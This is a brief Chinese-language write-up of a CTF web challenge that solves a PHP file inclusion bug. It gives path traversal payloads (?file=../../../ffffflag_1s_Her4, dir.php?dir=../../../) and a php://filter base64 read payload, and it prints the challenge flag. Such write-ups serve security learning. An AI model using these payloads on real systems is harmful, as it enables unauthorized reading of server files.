Web

babyt3

点进链接发现提示

include $_GET['file']

估计是文件包含漏洞

尝试包含index.php，发现一串base64编码，解码得到

继续解码hint，得到dir.php，继续尝试包含dir.php，又是一串base64，继续解码

用dir参数遍历目录 dir.php?dir=../../../

读取文件 ?file=../../../ffffflag_1s_Her4

或者继续伪协议读取?file=php://filter/read=convert.base64-encode/resource=../../../ffffflag_1s_Her4  然后再base64解码。

flag{8dc25fd21c52958f777ce92409e2802a}